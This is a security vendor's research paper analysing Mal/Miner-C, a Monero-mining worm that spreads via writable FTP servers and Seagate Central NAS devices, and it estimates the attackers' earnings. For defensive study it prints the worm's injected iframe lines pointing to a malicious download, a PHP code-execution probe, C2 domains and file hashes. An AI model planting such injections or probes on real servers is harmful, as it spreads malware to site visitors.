Download - Cryptomining malware on NAS servers - Sophos papers... · Cryptomining malware on NAS servers A couple of years ago, coin mining was a bubbling story. There were many threats that

CryptominingmalwareonNASserversAcoupleofyearsago,coinminingwasabubblingstory.Thereweremanythreatsthatusedinfectedmachinestominecryptocurrenciesattheexpenseofthevictim.Miningcoinsonsomeoneelse’smachinecouldprovidetheattackerwithfreeCPUresourcesfromeachinfectedsystem,sotherewasnoneedtostealdirectlyfromthevictim.Theinfectedmachinewouldalsodelivertheblockrewardsfromtheminingoperationsintotheattacker’swallet.

Theideawasperfectfromthecriminal’spointofview,butastimewentontheaveragePCwasnolongerpowerfulenoughtomineevenasinglecoin.Itwastimetogiveuponthistypeofattackandturntheattentiontootherwaystomakemoney,likeransomware.RecentlyanewmalwarefamilyhasfoundawaytousePCsefficientlytominenewtypesofcryptocurrency.

AttilaMarosi,SeniorThreatResearcher,SophosLabs

CryptominingmalwareonNASservers

Page2of21

ContentsIntroduction...................................................................................................................................3

Monero: the cryptocoin...............................................................................................................3

Mal/Miner-C..................................................................................................................................6

The main NSIS.........................................................................................................................6

tftp.exe.......................................................................................................................................9

Interesting notes....................................................................................................................10

Telemetry of the threat..........................................................................................................11

Seagate Central.........................................................................................................................12

Moneropool: mined coins.........................................................................................................15

Let’s do some math...............................................................................................................16

References.................................................................................................................................21


Page3of21

IntroductionAcoupleofyearsago,coinminingwasabubblingstory.Thereweremanythreatsthatusedinfectedmachinestominecryptocurrenciesattheexpenseofthevictim.Miningcoinsonsomeoneelse’smachinecouldprovidetheattackerwithfreeCPUresourcesfromeachinfectedsystem,sotherewasnoneedtostealdirectlyfromthevictim.Theinfectedmachinewouldalsodelivertheblockrewardsfromtheminingoperationsintotheattacker’swallet.

Theideawasperfectfromthecriminal’spointofview,butastimewentontheaveragepersonalcomputerwasnolongerpowerfulenoughtomineevenasinglecoin.Itwastimetogiveuponthistypeofattackandturntheattentiontootherwaystomakemoney,likeransomware.RecentlyanewmalwarefamilyhasfoundawaytousePCsefficientlytominenewtypesofcryptocurrency.

Monero:thecryptocoinForBitcoin,themainchallengewithminingwasthedifficulty.Asmoreblockswerediscovered,thedifficultyassociatedwithminingnewcoinsalsoincreasedexponentially.AfteracertainpointtherewasnomeasurableprofittobegainedfromminingusingpersonalPCs.[1]Asyoucanseeinthepicturebelow,thedifficultyofminingincreaseddramaticallyafter2012.

Afterthatpointin2012,miningonPCsbecameunprofitableandcriminalslostinterest,sotheygaveuptryingtousevictims’computerstomineandturnedtheirattentiontoothertypesofmalwaretomakemoney.


Page4of21

AlthoughminingBitcoinsisnolongerprofitable,thereareplentyofotherdigitalcurrenciesthatarequitenewandaresignificantlylessdifficulttomine.Manyofthemhaveverygoodcryptographicprotections,whichcaneffectivelyhidetheirusers.OneofthesecryptocurrenciesisMonero.[2]

MoneroisanewdigitalcryptocurrencythatiseasiertominethanBitcoin,asyoucanseebelow.

Inthisstate,miningthistypeofcryptocurrencyisprofitable.Criminalsrecognizedthisandstartedtospreadanewmalwarepayloadthatusesinfectedmachinestominecoinsattheexpenseofthesystemowner’sCPUandGPUresources.

Basedonmytestsandinformationavailableontheinternet,today’saverageCPUcancalculate50-1500hashespersecond.Thisisnotmuchonitsown,butifhundredsorthousandsarepooledtogetheritcouldbeenoughtobeofinteresttoacriminaltoexploit.

Mostoftoday’sPCshaveadedicatedvideomodule,orequipmenttoperformvideorenderingtaskscalledaGPU.Thismodulecanincreasethenumberofhashcalculationsdramatically.


Page5of21

(https://www.cryptocoinsnews.com/scrypt-mining-nvidia-gtx-750-ti/)


Page6of21

Mal/Miner-C

(hash:2a5b3c07e32b3b2b0c1ef33a10685027703440ec)

Thisthreatisinterestingnotonlyforthetechniqueitusestospreadandgetnewnodestohelpcalculatehashesforthecryptocurrency,butitalsoattemptstocopyitselftoopen(orweak)FTPfoldersinthehopeofbeingexecutedonothermachines.

ThemainNSISWehaveseenmanyversionsofthisthreat.Itisdevelopedandmaintainedcontinuously,butalltheversionsseemtoshareaspecificproperty:alltheversionsaredevelopedinNSIS[6].

Containsmultipleversionsofminers:

TheNSISscriptqueriesinformationaboutthehostsystem’sCPUtype(s)andGPUcapabilitiesbeforecreatingAutoRunentriesusedforrunningitself.(NSCpuCNMine32.exe/NSCpuCNMine64.exeandNSGpuCNMine.exe)66b965d1ee4013c80f7e0e27725e43f3d316325a NsGpuCNMiner.exe fd358cfe41c7aa3aa9e4cf62f832d8ae6baa8107 NsCpuCNMiner32.exe ce1fbf382e89146ea5a22ae551b68198c45f40e4 NsCpuCNMiner64.exe


Page7of21

ThemalwaredownloadsthelatestversionoftheNSISscriptfromoneofthesehosts:

§ stafftest.ru§ hrtests.ru§ profetest.ru§ testpsy.ru§ pstests.ru§ qptest.ru§ prtests.ru§ jobtests.ru§ iqtesti.ru

Theresourcesrequestedaretypicallynamed:

§ stat.html§ test.html§ text.html

Thedownloadeddocumentcontainsalistwiththeminingpoolsforwhichitwillcontribute.Inourinvestigationitseemsmoneropool.comistheprimarypoolusedbythisthreat.stratum+tcp://mine.moneropool.com:3333 stratum+tcp://xmr.hashinvest.net:1111 stratum+tcp://monero.crypto-pool.fr:3333 stratum+tcp://mine.cryptoescrow.eu:3333

Thetmp.inifilecontainsthewalletstologtheeffortoftheminingoperations.Theminingpoolwillcountandfinallysendpaymenttotheseaccounts:

TheresourceswhicharedownloadedatruntimeareobfuscatedbyROT47withacustomcharacterset.


Page8of21

Forexample,thestat.htmlfileoriginallylookslikethis:

Afterdecoding:

Thismethodgivesthecriminalsanopportunitytoupdatethemalwareeachtimeitisstarted.Sinceitgeneratesanewinitializationfilewhenitislaunched,ithelpsthemalwareavoidsecuritysolutions.Italsogivesthebotnetoperatorsachancetochangethepayloadofthethreatinthefuture,forexample,droppingransomwaretothevictim’smachineaftertheminingbusinessisnolongerprofitable.


Page9of21

tftp.exeInterestingly,notalltheinstancesofthemalwarecontainthetftp.exefile.23ec304fab33af1cacf0a167aeb7465631286128 tftp.exe

ThisexecutablejustrandomlygeneratesIPaddressesandtriestologin.Ithasanembeddedlistofusernamesandpasswordsthatitusestotrytogainaccess.

It’sakindofworm:ifahostgetsinfected,itnotonlyservesitsownerbyminingdigitalcurrency,butitalsotriestoinfectothersystemsviaFTPservices.

IftheembeddedcredentialsareabletosuccessfullyconnecttoanFTPservice,ittriestocopyitselftotheserverandmodifyanexistingweb-relatedfilewiththeextension.htmor.phpinanattempttofurtherinfectvisitorstothehostsystem.

Ifafilewiththisextensionisfound,thethreatinjectssourcecodethatcreatesaniFramereferencingthefilesinfo.ziporPhoto.scr.


Page10of21

Ifsomeoneopensapageinfectedlikethis,thepagewillpopupa“savefile”dialog.Thiskindofsocialengineeringisneededtoexecutethisthreat,asitcannotinfectmachinesautomatically,butitbringthethreatveryclosetothevictim.Ultimatelythisthreatneedstheusertoclickorrunthefileinorderforthenewsystemtobecomeinfected.

Thiswillbefurtherdescribedattheendofthispaper.Sincethisactionisnoisy,themajorityofpotentialdevicesthatcouldbeinfectedinthiswayhavealreadybeeninfected.Afteratime,thecriminalsbehindthisthreatmayopttonotspreadthis“tool”withmalware,asitmayproveineffectiveasamechanismforinfectingadditionalsystems.

InterestingnotesThereisascanner-orhacker-relatedservicethatIhavenodetailedinformationon,butIhaveobservedmanytimeswithinthelastyear.Itinvolvesplacingafileonthedevicewiththenamew0000000t.php.

Thisfilecontains:<?php echo base64_decode("bm9wZW5vcGVub3Bl"); ?>

Ifthefileuploadwassuccessful,requestingthisdocumentashttp://xxx.xxx.xxx.xxx/w0000000t.phpwouldresultinthefollowingresponse:nopenopenope

Thisprovidestheattackerwithproofofcodeexecutioncapabilitiesonthehost.

WhilesearchingforMal/Miner-C,wefoundmanyhostsidentifiedwiththismethod,indicatingthatthehostwasmostlikelycompromisedmorethanonce.Onthefirstoccasion,w0000000t.phpwasdeployed.Later,Mal/Miner-Cmayhavebeendeployedusingtheknowledgeofthehost’sabilitytoexecutecodeonthedevicebyinjectingtheiFrame.<?php echo base64_decode("bm9wZW5vcGVub3Bl"); ?> <iframe src=ftp://ftp:[email protected]//info.zip width=1 height=1 frameborder=0> </iframe> <iframe src=Photo.scr width=1 height=1 frameborder=0> </iframe>


Page11of21

ThehighlightedcredentialwasusedinthiscasebyMal/Miner-Ctouploadaninstanceofinfo.zip,Photo.scpaswellasinfectthe.phpfile.

TelemetryofthethreatInthefirst6monthsofthisyearwecounted1,702,476individualinstancesofthisthreat.However,thenumberofuniqueIPaddressescorrespondingtotheseinstanceswasonly3,150.Thereasonforthisissimple:ThethreatistryingtologintoFTPserviceswithembeddedcredentials(anonymous,root,admin,etc)withdefaultandfrequentlyusedweakpasswords.Ifsuccessful-andtheaccounthaswriteaccesswithusingtheFTPservice-theywillcopyPhoto.scrandinfo.ziptoeachfolderrecursively.Thus,ifasingleFTPserverisinfected,itisinfectedwithmultipleinstances.


Page12of21

SeagateCentral

ThisthreatisnottargetingtheSeagateCentraldevicespecifically;however,thedevicehasadesignflawthatallowsittobecompromised.Mostallofthesedeviceshavealreadybeeninfectedbythisthreat.

ThisishowtheSeagateCentraldeviceseparatedtheprivateandpublicfolders.

(Seagateprivateandpublicfolderconception)


Page13of21

Asyoucansee,thedevicecanfacilitatemultiplelevelsofaccesses,includingmanyprivateaccountsaswellasabuiltinpublicaccount.Ifyoureadthemanualcarefully,youwillfindasetofpropertieslikethis:

§ BydefaulttheNASsystemprovidesapublicfolderforsharingdata.Thispublicfolderandaccountcannotbedeletedordeactivated.

§ Forprivatedata,onemustcreateusersandeachuserwillhaveassociatedfoldersandindividuallogincredentialsforthem.

§ Theadminuserhastheabilitytoenablethedeviceforremoteaccessorturnthisfeatureoffentirely.

§ Ifthedeviceisenabledforremoteaccess,alltheaccountswillbeavailableonthedevice,includingtheanonymoususer.Inthisstate,yourdeviceisopenforanyonetowritetoyourpublicfolder.

§ Note:Thedevicecanbeusedtostreamyourmediacontentfromaremotelocation,onlythepublicfoldercontentcanbestreamedinthisway.Manyotherfeaturesareonlyavailablefromthepublicfolder.Isuspectthatthisisoneofthereasonswhysomuchpersonaldataresidesinthepublicfolderasusersdonotswitchbetweenfolders.Theyutilizetheonewhichprovidesthemthemostflexibilityandfunctionality,andinmostcasesthatisthepublicone.

IfwelogintoaSeagateCentral,wewillseesomethinglikethis:


Page14of21

ThereisafolderPhotosandafilePhoto.scr(sadly,mostoftheWindowsmachinesfileextensionsarenotdisplayed),anditalsohasadeceptiveiconthatisintendedtolooklikeatypicalWindowsfoldericon.

Anyonecouldbeeasilymisledtodoubleclickonthefileandcausetheprogramtobeginexecutiononthemachine.

Turningofftheremoteaccesscanpreventtheinfection,butalsomeanswelosetheabilitytoaccessthedeviceremotely.


Page15of21

Moneropool:minedcoinsMoneropoolisaminingcommunitytomineMonerocryptocurrency.Itbasedonaminingframeworkcallednode-cryptonote-pool.

([7]https://moneropool.com/)

Luckily,ifyouknowthehashofthewalletyoucangetareportabouttheactivitiesofit.ThemostinterestingpartofthisreportistheTotalPaidandtheHashRate.Thehashrateisanaccumulatedvalue.Usingthiswecancalculatehowmanycoinscanbeminedinaday.


Page16of21

TheTotalPaidisthemoneythatthecriminalsalreadyget,therealprofitofthenetwork.

Wealsogetthepaymenthistory,butwiththistechnologythereisnowaytotrackthepayments,whichisoneoftheprimaryfeaturesofthiscryptocurrency.

(addressinformation)

Let’sdosomemathBecausetheminingpoolsitesharesmuchofthisinformationandweknowthewalletaddressescollectingtherewards,wecandosomecalculationsaboutthenetworkanddiscoverwhatwas“mined”byit.


Page17of21

Herearetheknownwallethashes:

LuckilytheframeworkusedbyMoneropool(node-cryptonote-pool)[3]hasagoodAPIinterfaceanddatacanbequeriedeasily:curl 'https://api.moneropool.com/stats_address?address=4ASTnar5DSKjPW6kD5D5wm4Ha9abEeUU2ik2D3KwBxTV88iV5AHTraxLpAU4ZGbzneh4ohNCjX1LBZYPtuzN3xKxGrtrU2g&longpoll=true' | python -m json.tool

Theresult:

Inthiscase,usingonlyonewalletaddress,theminingpoolsent4913,5XMRcryptocoinstothecriminal’swallet.AtthemomentoftheHTTPrequest,theaccumulatedhashrateoftheinfectedmachineswas33,370hashespersecond.

Ifweiterateallthewalletaddressesandcalculatethefullpowerofthenetwork,thenaddthemoneytheyhavealreadymined,wegetthis:

moneropool.comhaspaid58,577XMRtothem.AtthetimeofthecalculationtheexchangeratefromXMTtoEURis1.3EUR.


Page18of21

([4]https://www.coingecko.com/en/price_charts/monero/eur)

Withtheexchangerateatthetimeitwasworth76,599EUR.

Furthermore,thenetworkoftheinfectedmachineshasanaccumulatedpowertocalculate431,000hashespersecond.Accordingtothecalculatorofthesite,itisenoughtomine327.7XMReachday.

Usingthesamemethodasbefore,wecanestimatethattheyearnapproximately428EUReachday.

Oneinterestingfinalnote:Theentiremonorepool.compoolhas861,000hashespersecondaccumulatedatthisrate.Andthenetworkoftheinfectedmachineshas431,000hashespersecond,whichmeansroughlyhalfofthetotalpooldoingtheminingisdoingsounintentionallyviainfectedsystems.

HereiswhatthefullMonerominingcommunitylookslike:2.5%ofthewholeminingcapacitycomesfrominfectedmachines.


Page19of21

AnonymousFTPswithwriteaccessInthiscase,Mal/Miner-Cusedaverysimpleandwell-knownconfigurationmistaketospreaditselfallovertheworld.Wedecidedtoseejusthowmanyhomesandsmallbusinesseshadvulnerabledevicesbyscanningtheinternettolookforthem.

First,weusedasearchenginecalledCensystoenumeratejustunder3millionFTPserversworldwide.Thenwefedthislistintoascanningscriptthat:

• TriedtoconnectanonymouslytotheFTPservice.• Ifallowed,retrievedadirectorylistingfromthedevice(toprovideanindicationof

compromisebasedonfilenames).• Ifallowed,testedtoseeifwriteaccesswaspermitted.

Theresultswereasfollows:�

• IPnumbersofFTPserversonoriginallist:2,932,833• FTPserversactiveduringthetest:2,137,571• Activeserversallowinganonymousremoteaccess:207,110• Activeserverswherewriteaccesswasenabled:7,263• ServerscontaminatedwithMal/Miner-C:5,137


Page20of21

�

Morethan70%oftheserverswherewriteaccesswasenabledhadalreadybeenfound,visitedand"borrowed"bycrookslookingforinnocent-soundingrepositoriesfortheirmalware.�

Ifyou'veeverassumedthatyou'retoosmallandinsignificanttobeofinteresttocybercriminals,andthusthatgettingsecuritysettingsrightisonlyreallyforbiggerorganizations,thisshouldconvinceyouotherwise.�

Verybluntlyput,ifyou'renotpartofthesolution,you'reverylikelytobecomepartoftheproblem.


Page21of21

References[1]http://theconversation.com/bitcoin-mining-is-about-to-become-a-lot-less-profitable-58302

[2]https://en.wikipedia.org/wiki/Monero_(cryptocurrency)

[3]https://github.com/zone117x/node-cryptonote-pool

[4]https://www.coingecko.com/en/price_charts/monero/eur

[5]http://www.seagate.com/files/www-content/support-content/external-products/seagate-central/en-us/seagate-central-user-guide-us.pdf

[6]https://en.wikipedia.org/wiki/Nullsoft_Scriptable_Install_System

[7]https://moneropool.com/